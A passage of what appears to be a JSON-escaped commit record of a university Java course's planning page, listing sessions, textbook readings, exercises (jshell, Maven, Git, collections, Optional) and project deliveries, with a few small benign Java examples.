Eck\u2019s http:\/\/math.hws.edu\/javanotes\/[book] (in chapter x)\n* EQx: quiz chapter x\n* EQx.y: question number y in Eck\u2019s book, from quiz chapter x\n* EEx.y: exercise number y in Eck\u2019s book, from exercises chapter x\n* Ranges are always given with ends included (EQ1.3 to 1.9 means 3 and 9 included)\n* Markers apply to the whole line. 
Example: \"4.3 intro to 4.3.2, 4.6.1 [I]\" means that everything in between 4.3 and 4.3.2 plus 4.6.1 are important.\n\n== General references\n* Eck\u2019s http:\/\/math.hws.edu\/javanotes\/[book]\n* St\u00e9phane Airiau\u2019s https:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/[course] (in French)\n* The https:\/\/app.gosoapbox.com\/event\/290081765\/[confusion barometer]\n* https:\/\/pixees.fr\/informatiquelycee\/[Site] de David Roche\n\n=== Take notes\n* 5 ways of taking notes https:\/\/www.youtube.com\/watch?v=AffuwyJZTQQ[video]\n* https:\/\/doi.org\/10.1177\/0956797614524581[Research] shows that taking notes, and especially writing what is said in your own words after some mental processing, permits more effective study\n\nLinks taken from the https:\/\/www.edx.org\/bio\/eric-s-lander[course] \u201cIntroduction to Biology - The Secret of Life\u201d, MITx\n\/\/www.edx.org\/course\/introduction-to-biology-the-secret-of-life-4, www.edx.org\/course?search_query=introduction%20to%20biology%20-%20the%20secret%20of%20life&level=introductory\n\n== Planning\n\n[[S1]]\n=== S1 (5 & 6 Feb 2020)\n\n*First half*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Pr%C3%A9sentation%20du%20cours%20Objet\/presentation.pdf[Pres course]\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Syntaxe\/presentation.pdf[Syntax] (without classes and objects) [Should be known or easy]\n* *Exercice* with https:\/\/docs.oracle.com\/en\/java\/javase\/13\/docs\/specs\/man\/jshell.html[jshell] (or https:\/\/tryjshell.org\/[online]):\n** Assign 4659 and 23 to variables, and show the result of multiplying these variables\n** Show the greatest divisor of 4659 that is different than 4659 (use the `%` operator and a loop)\n** Define a method that accepts an integer parameter and returns its greatest divisor except itself; use it to show the greatest divisor of 4659.\n** Going beyond: https:\/\/arbitrary-but-fixed.net\/teaching\/java\/jshell\/2017\/12\/14\/jshell-peculiarities.html[The peculiarities of the JShell]\n* Syntax (end): classes (no objects)\n** Material: http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.4] (Building blocks of programs), 2 intro (names and things), 2.1 (basic Java application), 2.2 (variables and primitive types), 2.3.3 (operations on strings), 2.4.1 (basic and formatted output), 2.5 (expressions), 2.6.7 (packages), ES3 intro to 3.6 (blocks, loops, algorithmic development, switch) [Should be known or easy]\n** http:\/\/math.hws.edu\/javanotes\/c2\/[ES2.2.1] (variables), 2.3.1 (subroutines), 2.4.6 (scanner for input) [I]\n** ES1.6 (modern UI), 1.7 (internet) [O]\n* *Exercice* with a text editor: define a class `MyMathClass` containing the method above and a method that returns the smallest divisor (greater than one) of its parameter; and a class `MyBooleanClass` containing a method `xor` returning `true` iff exactly one of its parameter is `true`. Copy-paste this in jshell and make sure you can call all these methods from jshell. 
\n\n*Todo*\n\n* Install a https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Various.adoc#installing-the-jdk[JDK] from OpenJDK (11 or later)\n* Install https:\/\/www.eclipse.org\/downloads\/packages\/[Eclipse IDE] \u201cfor Java Developers\u201d\n* Install https:\/\/git-scm.com\/download[git]\n* Redirect your e-mails @ Dauphine if necessary to ensure you receive announcements posted on MyCourse\n\n*Second half*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Ex%C3%A9cution\/presentation.pdf[Ex\u00e9cution]\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.1] (machine language), 1.2 (Asynchronous events), 1.3 (JVM)\n* *Exercises* (TODO home):\n** Add a `main` method to your `MyBooleanClass` that prints \u201cHello, this is my boolean class.\u201d Use `System.out.println(\"\u2026\")` to print.\n** Add a `main` method to your `MyMathClass` that accepts two arguments that can each be either `\"true\"` or `\"false\"`; the method calls your `xor` method with the corresponding parameters and prints the result.\n** Compile `MyBooleanClass` with https:\/\/docs.oracle.com\/en\/java\/javase\/13\/docs\/specs\/man\/javac.html[javac], move the resulting file into its own folder, execute it from the source folder.\n** Find out _in the official documentation_ how to compile the class and let the resulting class be placed in its own folder, in a single step (without you having to move the file afterwards)\n** Compile `MyMathClass`, move the resulting file into its own folder (alone), and execute it from the source folder. Why does it fail? What does the error message indicate, and how is it related to the problem? Fix the problem and execute it, first by grouping the class files, second, while keeping both class files in different folders.\n** (link:http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.1] to 2.2, supposedly known)\n** http:\/\/math.hws.edu\/javanotes\/c1\/quiz.html[EQ1.3] to 1.9\n** http:\/\/math.hws.edu\/javanotes\/c2\/quiz.html[EQ2.1] to 2.4; 2.6 to 2.9; 2.11\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Notions%20objets\/presentation.pdf[Basics of objects]\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.5] (objects), 2.3.2 (classes and objects)\n** *http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.3] to 2.6*; use Scanner, not TextIO\n** *http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.7]*: use user input (Scanner) instead of file input; do not use TextIO\n** *http:\/\/math.hws.edu\/javanotes\/c3\/exercises.html[EE3.1] to 3.3*\n** *EE3.4, 3.6 [I]*\n** EE3.8, 3.9 [O]\n\n[[S2]]\n=== S2 (28 Feb)\n\n* Supposed known: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/README.adoc[Git]; https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Shell.adoc[Shell]; Execution (see above).\n* Reminder: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Notions%20objets\/presentation.pdf[Basics of objects]\n** Two roles of classes; static vs. instance methods (whose behavior depends on values of parameters and instance attributes)\n* Note about packages (for using `Scanner`)\n** A class has a short name and a package, hence, a long name. (And two file names!)
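+\nFor instance (a sketch; `Greeter` is an invented example class, `Scanner` is the short name and `java.util.Scanner` the long, fully qualified one):\n+\n[source,java]\n----\nimport java.util.Scanner;\t\/\/ short name Scanner, package java.util\n\npublic class Greeter {\t\/\/ source in Greeter.java, compiled to Greeter.class\n\tpublic static void main(String[] args) {\n\t\tScanner scanner = new Scanner(System.in);\t\/\/ same as: new java.util.Scanner(System.in)\n\t\tSystem.out.println(\"Hello, \" + scanner.nextLine() + \"!\");\n\t}\n}\n----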
\n* *Exercises* (TODO home):\n** http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.2] to 2.6; use Scanner, not TextIO\n** http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.7]; use user input (Scanner) instead of file input; do not use TextIO\n** http:\/\/math.hws.edu\/javanotes\/c3\/exercises.html[EE3.1] to 3.3\n** EE3.4, 3.6 [I]\n* Eclipse & Java:\n** Use Outline view\n** Use Problems view\n** Use Javadoc view\n** Content completion with CTRL+Space\n** Organize imports: from an editor, select `Source` \/ `Organize Imports`\n** In the http:\/\/help.eclipse.org\/latest\/topic\/org.eclipse.jdt.doc.user\/gettingStarted\/qs-2.htm[Basic tutorial], read: Creating a Java Class; Renaming Java elements; Navigate to a Java element's declaration; Viewing the type Hierarchy; Running your programs\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Maven\/README.adoc[Maven]: Introduction\n** Exercise: *Import a Maven project into Eclipse*\n\n[[S3]]\n=== S3 (4 March)\n\n* Graded exercise similar to https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Dep-Git.adoc[Dep-Git] and to the exercises related to https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/README.adoc[Git] in this course. Your GitHub username and git `user.name` must be identical (and for all exercises to come as well). See https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Git-Br.adoc[Git-Br] (8h32 to 8h52).\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Maven\/README.adoc[Maven], and *exercises* (TODO home: Modern project)\n* Two major principles of software engineering: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Contrat\/presentation.pdf[contract] and fail-fast.\n** Mechanisms: interface; black box; preconditions and postconditions; javadoc; exceptions\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES3.7] Exceptions (except 3.7.3)\n** ES4 Subroutines, lambdas, packages, javadoc.\n** ES4.2.4 Member Variables [I]\n** ES4.3 intro to 4.3.2, 4.7.1 Preconditions and Postconditions [I]\n** Javadoc: http:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/cours3.pdf[Airiau C3], p. 12 to 19.\n** http:\/\/math.hws.edu\/javanotes\/c4\/quiz.html[EQ4]\n** https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Assert\/presentation.pdf[assertions] (advanced)\n** Illustration: ES4.7.2 A Design Example\n* Javadoc in Eclipse: `Source` \/ `Generate Element Comment` (on methods and classes!), use the `Javadoc` view\n* Append `throws IllegalArgumentException` (for example) to your method header when you want to draw attention to it, and document it in Javadoc\n* *Exercises:*\n** Comment several methods with Javadoc, including the exceptions\n** Find out how you can find, when your program crashes because of an exception, the exact place where the exception was raised and which call caused the crash\n** http:\/\/math.hws.edu\/javanotes\/c4\/exercises.html[EE4.1], 4.2\n** EE4.3, 4.4 [I] (TODO home)\n** EE4.7\n\n[[S4]]\n=== S4 (5 March)\n\n* Graded exercise using your knowledge from Shell; Execution; EE2.x; EE3.x (see above). See https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Ex\u00e9cution\/Print%20exec.adoc[Print exec]. (13h47 to 14h47)
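+\nAs a recap of the contract and fail-fast principles from S3 above, a minimal sketch of a documented, fail-fast precondition (the `Person` class and its `setAge` method are invented for illustration):\n+\n[source,java]\n----\npublic class Person {\n\tprivate int age;\n\n\t\/**\n\t * Sets the age of this person.\n\t *\n\t * @param age the new age, in years; must be non-negative\n\t * @throws IllegalArgumentException if age is negative\n\t *\/\n\tpublic void setAge(int age) {\n\t\tif (age < 0) {\n\t\t\tthrow new IllegalArgumentException(\"Negative age: \" + age);\t\/\/ fail fast\n\t\t}\n\t\tthis.age = age;\n\t}\n}\n----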
\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Objets\/presentation.pdf[Objets]\n** http:\/\/math.hws.edu\/javanotes\/c5\/[ES5] intro to 5.4\n* *Exercises:*\n** http:\/\/math.hws.edu\/javanotes\/c5\/exercises.html[EE5.1], 5.2\n** EE5.3 [I]\n\/\/ ** Supplementary requirement: you will archive `PairOfDice` and `StatCalc` into a JAR file and use this in a new Eclipse project where only one class is defined, which uses `PairOfDice` and `StatCalc`. Commit both projects into your repository (in two separate folders). The structure of your git repository should be as follows. Please follow the exact naming scheme.\n\/\/ ** `project43\/`\u2026 (contains `src` with your source code inside a sub-folder of it)\n\/\/ ** `project47\/`\u2026 (contains `src` with your source code inside a sub-folder of it)\n\/\/ ** `project53utils\/`\u2026 (contains `utils.jar` and `src\/` with `PairOfDice` and `StatCalc` inside a sub-folder of it)\n\/\/ ** `project53main\/`\u2026 (contains `src\/` with your main method)\n\/\/* You may use the `groupId` `io.github.<yourgithubusername>`.\n** EE5.4, EE5.5: Play Blackjack!\n\n[[S5]]\n=== S5 (18 March)\n\n* Graded programming exercise\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/JUnit.adoc[Unit testing]\n* Inheritance: Object; print an object; more polymorphism.\n* Generics and https:\/\/www.scientecheasy.com\/2018\/09\/collection-hierarchy-in-java.html[collections].\n** For this course, use by default: `ArrayList` \/ `ImmutableList`; `LinkedHashSet` \/ `ImmutableSet`; `LinkedHashMap` \/ `ImmutableMap`.\n* Exceptions: checked and unchecked\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Search%20path\/README.adoc[Search path] (packages, classes and directories).\n* Java Interfaces and the Calculator example: replaceability and use as type\n\/\/* Exceptions in Java: http:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/cours5.pdf[Airiau C5] (and see slides Contrat, appendix)\n\n* https:\/\/www.youtube.com\/watch?v=lcYkOh4nweE&t=1m21s[Mars Climate Orbiter] (1m21 to 5m18; small mistake in the video: it\u2019s Newton times second, not Newton force per second; see also https:\/\/en.wikipedia.org\/wiki\/Mars_Climate_Orbiter[Wikipedia]; similarly http:\/\/www-users.math.umn.edu\/~arnold\/disasters\/ariane.html[sad] https:\/\/www.youtube.com\/watch?v=gp_D8r-2hwk[story]{emptyattribute})\n\n\n*Material and going beyond*\n\n* http:\/\/math.hws.edu\/javanotes8\/c5\/[ES5.5] to 5.8\n* http:\/\/math.hws.edu\/javanotes8\/c10\/[ES10] to 10.2\n\/\/ simple inheritance (no TextIO depended on, actually), but complex set up\n* http:\/\/math.hws.edu\/javanotes8\/c5\/exercises.html[EE5.4] (use `Scanner` instead of `TextIO`)\n\/\/interfaces with generics and collections\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.4] \n\/\/ list of words\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.6] (you may use standard input instead of file input)\n\/\/ set (long)\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c10\/exercises.html[EE10.2]\n\n*Exercises*\n\n* Write an interface `Calculator` with a method `add` that takes two integers as parameters. Write a method `tester` in a different class that receives a calculator as a parameter and checks that `add(2, 3)` gives 5. Write a `SimpleCalculator` that uses the normal Java addition (\u201c+\u201d) to implement `Calculator`.
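+\nA possible sketch of the three pieces (each top-level class would go in its own file; the check uses a plain `AssertionError`, one choice among others):\n+\n[source,java]\n----\npublic interface Calculator {\n\tint add(int a, int b);\n}\n\npublic class SimpleCalculator implements Calculator {\n\t@Override\n\tpublic int add(int a, int b) {\n\t\treturn a + b;\t\/\/ the normal Java addition\n\t}\n}\n\npublic class CalculatorTester {\n\tpublic static void tester(Calculator calculator) {\n\t\tif (calculator.add(2, 3) != 5) {\n\t\t\tthrow new AssertionError(\"add(2, 3) should give 5\");\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) {\n\t\ttester(new SimpleCalculator());\t\/\/ prints nothing: the check passes\n\t}\n}\n----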
\n\/\/interfaces with generics\n* Implement a `Predicate<String>` to represent a function that maps a String to `true` iff its length is even.\n* Define a class `Pair<T1, T2>` to store an ordered pair of objects of type `T1` and `T2`.\n\/\/ implements but no inheritance\n* http:\/\/math.hws.edu\/javanotes8\/c5\/exercises.html[EE5.7] [I] (the part about anonymous classes is optional)\n\/\/** Supplementary requirements: your code must lie in at least two packages;\n\/\/** The idea of this exercise is that you simulate that three different people work on this exercise: one provides some interfaces; another implements the interfaces; a third one uses the interfaces and their implementations to solve the exercise (except you represent all these persons).\n\/\/** Declare at least one interface in another Eclipse project, exported as a Java archive (JAR file);\n\/\/** implement those interfaces in another Eclipse project, exported as a Java archive (JAR file) (will you need the previous JAR file? Why \/ why not?);\n\/\/** solve the exercises in a third Eclipse project (will you need the previous JAR files? Which ones and why?).\n\/\/ read, sort a list\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.1], 7.5 (except that you can use built-in sorting functions from the Java API).\n* A class E1 that asks the end-user for a set of integer values. The user enters 0 to stop entering values. Store these values in a Set of Integer values (discarding duplicates). Do it again, obtaining a second set. Then print each set of values entered, then the union of both sets. For example, if the user enters 3, 4, 2, 0, then 1, 1, 2, 5, 0, it prints: 3, 4, 2, then 1, 2, 5, then 3, 4, 2, 1, 5. Use Java sets and interfaces appropriately. [I]\n\n*Todo*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#configuration[Tools]: use correct Eclipse config. (Check warnings, compile errors, instructions!)\n* Commit mandatory exercises https:\/\/classroom.github.com\/a\/X7DXDNfU[here].\n\n[[S6]]\n=== S6 (Wednesday 17th of April, 2019)\n\n*Lecture*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/Maven[Maven]\n* Use https:\/\/mvnrepository.com\/artifact\/com.google.guava\/guava\/27.1-jre[Guava] `https:\/\/github.com\/google\/guava\/wiki\/PreconditionsExplained[Preconditions]#checkArgument`\n* Override `toString()`: use Guava https:\/\/guava.dev\/releases\/snapshot\/api\/docs\/com\/google\/common\/base\/MoreObjects.ToStringHelper.html[`MoreObjects`]\n* null (started)\n* Correct E1\n.. split into subroutines?\n.. general contract (Collection instead of LinkedList)?\n.. unique fully qualified class names?\n.. appropriate structures? (Set)\n.. reusable if the numbers are obtained differently? (read from files)\n.. appropriate naming? (searchNumber returning a boolean should rather ask a question: isIn)\n.. javadoc documentation where necessary?\n.. adequate use of the structures? (do not search for a number in a list)\n.. conventions respected? (variable and method names in camelCase, class names in PascalCase, package names in lowercase, \u2026)\n.. instance methods (not static ones)?\n.. no useless comments (such as auto-generated \/\/TODO, empty @author, \u2026)\n.. 
(micro) no comparison to `true` (`if (isBig == true)`)\n.. you manage to see the rendered result of your javadoc (example: `@param truc of type String` is useless)\n* Maps, Comparable, Comparator (see also Airiau\u2019s slides)\n\n*Material and going beyond*\n\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c10\/[ES10.3] to 10.5\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c8\/[ES8] intro to 8.4\n\n*Exercises*\n\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.1]\n\/\/interfaces with generics and collections\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.4]\n\n[[S7]]\n=== S7 (Friday 19th of April, 2019)\n\n* No plagiarism (but reuse!)\n* Static factory method\n** A static method\n** Produces the type of the class it belongs to\n** Serves as a factory\n** Examples: `String.valueOf(true);`, `Integer.valueOf(3);`, `ImmutableList.of();`, `String.link:https:\/\/docs.oracle.com\/en\/java\/javase\/11\/docs\/api\/java.base\/java\/lang\/String.html#format(java.lang.String,java.lang.Object...)[format](\"Person name: %s, id: %d\", name, id);`\n* https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/arguments.html[Varargs]\n* Files and https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Flows.adoc[flows]\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Resources.adoc[Resources]; exercise: read a file from the class path.\n* Primitive types (autoboxing); optional; give guarantees: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Null.adoc[Best practices]\n\n*Exercises*\n\n* Implement an interface `EasyMap` with two methods: a method that puts a pair of key and value of your choice into a map, and a method that returns an `Optional` containing the value corresponding to the given key (parameter of the method) or that returns an empty `Optional` if there is no such value. Implement this interface in a class `EasyMapImpl`. Provide a static factory method in the interface `EasyMap`. Minimize the number of lines of code (but not at the price of readability). Note that this exercise implements the https:\/\/en.wikipedia.org\/wiki\/Forwarding_(object-oriented_programming)[forwarding] pattern.\n** Define `MyComparator`, a class that implements a comparator over your values. Add a third method to `EasyMap` that returns a list of values ordered by that comparator.
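+\nOne possible sketch (the exercise leaves the key and value types free; this sketch assumes String keys and Integer values, forwards to a `LinkedHashMap`, and omits the `MyComparator` part):\n+\n[source,java]\n----\nimport java.util.LinkedHashMap;\nimport java.util.Map;\nimport java.util.Optional;\n\npublic interface EasyMap {\n\t\/** Static factory method: callers never see the implementing class. *\/\n\tstatic EasyMap newInstance() {\n\t\treturn new EasyMapImpl();\n\t}\n\n\tvoid put(String key, Integer value);\n\n\tOptional<Integer> get(String key);\n}\n\nclass EasyMapImpl implements EasyMap {\n\tprivate final Map<String, Integer> delegate = new LinkedHashMap<>();\n\n\t@Override\n\tpublic void put(String key, Integer value) {\n\t\tdelegate.put(key, value);\n\t}\n\n\t@Override\n\tpublic Optional<Integer> get(String key) {\n\t\treturn Optional.ofNullable(delegate.get(key));\t\/\/ empty when the key is absent\n\t}\n}\n----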
\n\/\/ list of words\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.6] (do not use the provided method: split words at space character; use standard file IO instead of TextIO)\n\n*Todo*\n\n* Read https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#eclipse[Eclipse] doc (or equivalent for your IDE of choice)\n* Make sure you can see the javadoc of the JDK and of the libraries you add through Maven, from within your IDE, for coding efficiently\n* If you use an IDE different from Eclipse, you are supposed to adjust your parameters to match the configuration provided for Eclipse (see Tools.adoc).\n\n[[S8]]\n=== S8 (Monday 6th of May, 2019)\n\n* Questions?\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Extractor.adoc[exercise]\n** Submitted code must be clean: well-formatted, clear, well named, \u2026\n** Must compile using Maven (otherwise, no point awarded)\n** No warning given by Eclipse\n** 15h44 to 16h24\n* Choose your https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Projets.adoc[project]\n* Comparing Persons, revisited, using https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/lambdaexpressions.html[Lambda Expressions]\n* Override `equals` and `hashCode`\n\n[[S9]]\n=== S9 (Friday 10th of May, 2019)\n\n* Tentative coefficients: graded quiz: 0.5, Extractor: 0.5, next graded exercises: 1, last graded exercise: 2\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/DevOps\/CI.adoc[CI]: Travis\n* TODO: delivery 1 before the end of the day preceding S10.\n\n[[S10]]\n=== S10 (Monday 20th of May, 2019)\n\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Dep-Git.adoc[exercise] (about Maven dependencies and Git)\n* https:\/\/stackoverflow.com\/questions\/28972893\/what-is-exception-wrapping-in-java[Wrapping] exceptions\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Log\/README.adoc[Logging]\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Annotations\/presentation.pdf[Annotations]\n\n[[S11]]\n=== S11 (Thursday 23rd of May, 2019)\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/SWT[SWT]\n\n[[S12]]\n=== S12 (Friday 24th of May, 2019)\n\n* Back to https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/lambdaexpressions.html[Method references]\n* TODO: next delivery before the end of the day preceding the next session.\n\n[[S13]]\n=== S13 (Tuesday 4th of June, 2019)\n\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/JUnit.adoc[exercise]: unit tests \/ access resources through class path \/ continue Extractor.\n** 17h17 to 17h42 (5 min for delays due to GitHub)\n\n* Write the list of PRs for Iteration 2 for each sub-team in `README.adoc` in your `dev` branch.\n\n[[S14]]\n=== S14 (Wednesday 5th of June, 2019)\n\n* Licenses and philosophy: https:\/\/www.gnu.org\/philosophy\/philosophy.html[GNU]; https:\/\/opensource.org\/[OSI]; Copyleft (GNU https:\/\/opensource.org\/licenses\/GPL-3.0[GPL]); Non-copyleft (https:\/\/opensource.org\/licenses\/MIT[MIT])\n* Parsing HTML: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/HTML%20to%20DOM.adoc[DOM]\n* Accessing REST web services: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/WS%20client\/JAX-RS%20client.adoc[JAX-RS client]\n\n[[S15]]\n=== S15 (Monday 17th of June, 2019)\n\n* Work on 
project\n* TODO: delivery 3 before the end of Thursday the 20th, with PRs assigned to a Milestone \u201cIteration 3\u201d (thanks to the Assisted Board Games team for this tip).\n\n[[S16]]\n=== S16 (Friday 21st of June, 2019)\n\n* Work on project\n* TODO: delivery 4 before the end of Friday the 28th, with PRs assigned to a Milestone \u201cIteration 4\u201d.\n** Optional: a task that adds to your README elements that you want me to take into account in my overall evaluation (difficulties encountered, work I might have forgotten to evaluate in a previous iteration, \u2026). Support your claims with verifiable elements (commits, documents, \u2026).\n** Submission allowed until the end of Saturday the 29th if necessary, but a bonus will be granted for a submission on Friday evening.\n* Presentation before the end of Sunday the 30th, directly on the master branch, in `Doc\/Pr\u00e9sentation 2019.pdf`.\n\n[[S17]]\n=== S17 (Monday 1st of July, 2019)\n\n* Presentations: \nhttps:\/\/github.com\/13tomoore\/J-Confs\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[J-Confs], \nhttps:\/\/github.com\/Amioplk\/Apartments\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[Apartments], \nhttps:\/\/github.com\/CHARLONCyril\/2D-Library\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[2D Library], \nhttps:\/\/github.com\/busychess\/Assisted-Board-Games\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[Assisted Board Games], \nhttps:\/\/github.com\/j-voting\/J-Voting\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[J-Voting]\n** Code & slides on the presentation computer\n** 15 to 30 minutes\n** Graded: interest for the audience; the audience\u2019s understanding of the context and goal of the project; the audience\u2019s understanding of the code architecture and technical aspects; clear distinction between the features already present and those added; possible originality & creativity; \u2026\n* Votes\n* Evals, and https:\/\/github.com\/oliviercailloux\/projets\/blob\/master\/Licences\/Licence.adoc[Licences]: https:\/\/github.com\/oliviercailloux\/projets\/raw\/master\/Licences\/Declaration%20of%20licensing.odt[Decl]\n\n","old_contents":"= Planning\n:toc: preamble\n:sectanchors:\n\/\/works around awesome_bot bug that used to be published at github.com\/dkhamsing\/awesome_bot\/issues\/182.\n:emptyattribute:\n\nThe entry page of the Java course in L3.\n\n== Prerequisites\nYou know algorithmics and, preferrably, the basic syntax of Java (or a related language). If you have followed an algorithmics course with illustrations and exercices in Java, you satisfy the prerequisites.\n\n== Abbreviations\n\n* [I]: Important\n* [O]: Optional (do it if you are specifically interested in the related aspect)\n* ESx.y (or ESx.y.z): designates section x.y (or x.y.z) in Eck\u2019s http:\/\/math.hws.edu\/javanotes\/[book] (in chapter x)\n* EQx: quiz chapter x\n* EQx.y: question number y in Eck\u2019s book, from quiz chapter x\n* EEx.y: exercice number y in Eck\u2019s book, from exercices chapter x\n* Ranges are always given with ends included (EQ1.3 to 1.9 means 3 and 9 included)\n* Markers apply to the whole line. 
Example: \"4.3 intro to 4.3.2, 4.6.1 [I]\" means that everything in between 4.3 and 4.3.2 plus 4.6.1 are important.\n\n== General references\n* Eck\u2019s http:\/\/math.hws.edu\/javanotes\/[book]\n* St\u00e9phane Airiau\u2019s https:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/[course] (in French)\n* The https:\/\/app.gosoapbox.com\/event\/290081765\/[confusion barometer]\n* https:\/\/pixees.fr\/informatiquelycee\/[Site] de David Roche\n\n=== Take notes\n* 5 ways of taking notes https:\/\/www.youtube.com\/watch?v=AffuwyJZTQQ[video]\n* https:\/\/doi.org\/10.1177\/0956797614524581[Research] shows that taking notes, and especially writing what is said in your own words after some mental processing, permits more effective study\n\nLinks taken from the https:\/\/www.edx.org\/bio\/eric-s-lander[course] \u201cIntroduction to Biology - The Secret of Life\u201d, MITx\n\/\/www.edx.org\/course\/introduction-to-biology-the-secret-of-life-4, www.edx.org\/course?search_query=introduction%20to%20biology%20-%20the%20secret%20of%20life&level=introductory\n\n== Planning\n\n[[S1]]\n=== S1 (5 & 6 Feb 2020)\n\n*First half*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Pr%C3%A9sentation%20du%20cours%20Objet\/presentation.pdf[Pres course]\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Syntaxe\/presentation.pdf[Syntax] (without classes and objects) [Should be known or easy]\n* *Exercice* with https:\/\/docs.oracle.com\/en\/java\/javase\/13\/docs\/specs\/man\/jshell.html[jshell] (or https:\/\/tryjshell.org\/[online]):\n** Assign 4659 and 23 to variables, and show the result of multiplying these variables\n** Show the greatest divisor of 4659 that is different than 4659 (use the `%` operator and a loop)\n** Define a method that accepts an integer parameter and returns its greatest divisor except itself; use it to show the greatest divisor of 4659.\n** Going beyond: https:\/\/arbitrary-but-fixed.net\/teaching\/java\/jshell\/2017\/12\/14\/jshell-peculiarities.html[The peculiarities of the JShell]\n* Syntax (end): classes (no objects)\n** Material: http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.4] (Building blocks of programs), 2 intro (names and things), 2.1 (basic Java application), 2.2 (variables and primitive types), 2.3.3 (operations on strings), 2.4.1 (basic and formatted output), 2.5 (expressions), 2.6.7 (packages), ES3 intro to 3.6 (blocks, loops, algorithmic development, switch) [Should be known or easy]\n** http:\/\/math.hws.edu\/javanotes\/c2\/[ES2.2.1] (variables), 2.3.1 (subroutines), 2.4.6 (scanner for input) [I]\n** ES1.6 (modern UI), 1.7 (internet) [O]\n* *Exercice* with a text editor: define a class `MyMathClass` containing the method above and a method that returns the smallest divisor (greater than one) of its parameter; and a class `MyBooleanClass` containing a method `xor` returning `true` iff exactly one of its parameter is `true`. Copy-paste this in jshell and make sure you can call all these methods from jshell. 
